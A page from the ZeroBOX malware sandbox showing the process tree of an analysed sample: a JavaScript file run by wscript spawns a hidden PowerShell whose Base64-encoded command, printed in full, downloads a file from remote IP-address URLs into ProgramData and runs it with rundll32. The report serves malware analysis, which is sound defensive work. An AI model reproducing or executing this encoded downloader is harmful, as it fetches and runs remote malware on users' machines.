popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Yezmtqs.js

    3020

    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Yezmtqs.js" DilemmaticHorripilating Aleppine Theanthroposophy arterialisation

      2200

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABGAHIAbwBzAHQAaQBuAGcARwB5AHIAZQBuAGMAZQBwAGgAYQBsAG8AdQBzACAAPQAgADUANwA4ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyADsAJAB0AHIAaQByAGUAYwB0AGEAbgBnAHUAbABhAHIAQQBsAGwAbwB0AHIAYQBuAHMAcABsAGEAbgB0AGEAdABpAG8AbgAgAD0AIAA0ADQANAA7ACQAdQBuAGQAaQBjAHQAYQB0AGUAZABJAGwAbAB1AGMAaQBkAGEAdABpAHYAZQAgAD0AIAA1ADkAOAA7ACQATwB3AGwAZQB0AHMAUwBjAGEAbgBkAGkAbgBhAHYAaQBhAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEkAQQBOAEEAQQB2AEEARABFAEEAVABnAEIAdgBBAEUAUQBBAFcAQQBBAHYAQQBHAG8AQQBRAGcAQgBpAEEARgBZAEEAVwBRAEIANgBBAEUAZwBBAGQAQQBCAHgAQQBHAGMAQQBiAGcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQB5AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAdwBCAHIAQQBIAEkAQQBkAFEAQgAxAEEARgBVAEEAUwBRAEEAdgBBAEgAVQBBAFcAUQBCAE4AQQBFAFkAQQBTAFEAQgBSAEEARwBZAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATQBBAEEAdgBBAEgASQBBAFUAUQBBADQAQQBIAGMAQQBSAFEAQgBCAEEARgBBAEEATAB3AEIAMQBBAEgAbwBBAFQAdwBCAGkAQQBEAGsAQQBjAHcAQgA2AEEARwBJAEEAVAB3AEIAWgBBAEEAPQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE4AUQBBADEAQQBDADQAQQBNAGcAQQB4AEEARABNAEEATABnAEEAeQBBAEQAUQBBAE4AdwBBAHYAQQBHAGMAQQBXAGcAQgBZAEEARwAwAEEAYQBRAEIAcQBBAEMAOABBAGQAZwBCAGoAQQBEAE0AQQBRAFEAQgBPAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAdwBhAHIAbgBFAHQAaQBvAGwAYQB0AGUAIABpAG4AIAAkAE8AdwBsAGUAdABzAFMAYwBhAG4AZABpAG4AYQB2AGkAYQBuAHMAIAAtAHMAcABsAGkAdAAgACIAYQAiACkAIAB7ACQAUwBrAGkAbgBiAG8AdQBuAGQAIAA9ACAAMQAyADYAOwB0AHIAeQAgAHsAJABCAGUAcwBwAGEAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwAwAEEAYQBRAEIAMABBAEcARQBBAGQAQQBCAGwAQQBDADQAQQBaAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEgAQQBBAGMAZwBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQQA9AD0ASgBhAFUAUABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG4AQQBHAFUAQQBiAHcAQgBrAEEARwBVAEEAYwB3AEIAcABBAEcATQBBAGMAdwBBAHUAQQBIAFEAQQBjAGcAQgBoAEEARwBRAEEAWgBRAEEAPQAiADsAJABzAGgAYQBtAG0AYQBzAGgAaQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGgAQQBHADQAQQBZAHcAQgBsAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGoAQQBHADAAQQAiADsAJABTAHQAZQBuAGMAaQBsAGUAcgAgAD0AIAAxADIANQA7ACQAbwB4AHkAYwBlAGwAbAB1AGwAbwBzAGUAQwBhAHYAZQByAG4AbwB1AHMAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAHcAYQByAG4ARQB0AGkAbwBsAGEAdABlACkAKQA7AHcAZwBlAHQAIAAkAG8AeAB5AGMAZQBsAGwAdQBsAG8AcwBlAEMAYQB2AGUAcgBuAG8AdQBzAGwAeQAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAG0AZQBnAGEAbABvAHMAYQB1AHIAaQBhAG4AQwBoAGEAdAB0AGUAcgBiAG8AeABlAHMALgBXAGkAZwBlAG8AbgBUAGUAZQBuAHMAaQBlAHMAdAA7ACQAQgBpAHMAcwBlAGwAbABpAGEAVwByAGUAYQBrAGwAZQBzAHMAIAA9ACAAMgA3ADsAJABUAGEAcABhAGwAbwAgAD0AIAA4ADUAMwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABtAGUAZwBhAGwAbwBzAGEAdQByAGkAYQBuAEMAaABhAHQAdABlAHIAYgBvAHgAZQBzAC4AVwBpAGcAZQBvAG4AVABlAGUAbgBzAGkAZQBzAHQAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADcAMQAzADIAMQApAHsAJABuAGUAbQBhAHQAbwBkAGUARwBvAGwAaQBhAHQAaABzACAAPQAgACIAVQBuAHMAcABlAGUAZABpAG4AZQBzAHMATQBpAGwAbABpAG8AbgBpAHMAbQAiADsAJABwAGgAbwB0AG8AcwB5AG4AdABoAGUAdABpAGMAYQBsAGwAeQBXAG8AcgB0AGgAZQBkACAAPQAgADIANgA1ADsAJABOAG8AbgBwAG8AcgB0AGUAbgB0AG8AdQBzAEwAdQBuAHQAaQBuAGcAIAA9ACAAMQA4ADcAOwBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBiAFEAQgBsAEEARwBjAEEAWQBRAEIAcwBBAEcAOABBAGMAdwBCAGgAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIARABBAEcAZwBBAFkAUQBCADAAQQBIAFEAQQBaAFEAQgB5AEEARwBJAEEAYgB3AEIANABBAEcAVQBBAGMAdwBBAHUAQQBGAGMAQQBhAFEAQgBuAEEARwBVAEEAYgB3AEIAdQBBAEYAUQBBAFoAUQBCAGwAQQBHADQAQQBjAHcAQgBwAEEARwBVAEEAYwB3AEIAMABBAEMAdwBBAGMAQQBCAHkAQQBHAGsAQQBiAGcAQgAwAEEARABzAEEAIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAQwBvAHMAdABvAGMAbwBsAGkAYwAgAD0AIAA1ADIAMAA7ACQAUQB1AGEAZAByAHUAcABsAGUAZAAgAD0AIAA2ADkAOQA7AH0AfQAkAEYAaQBlAGwAZABmAGEAcgBlACAAPQAgADgANAA0ADsAJABSAGEAcwBjAGEAcwBzAGUAIAA9ACAAIgBSAGUAYQByAGkAbgBnACIAOwAkAGUAcABvAG4AZwBlAFIAZQBpAG4AZgBsAGEAbQBlAGQAIAA9ACAAIgBVAG4AaQBtAHAAZQBkAGkAbgBnACIAOwA="

        2340

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf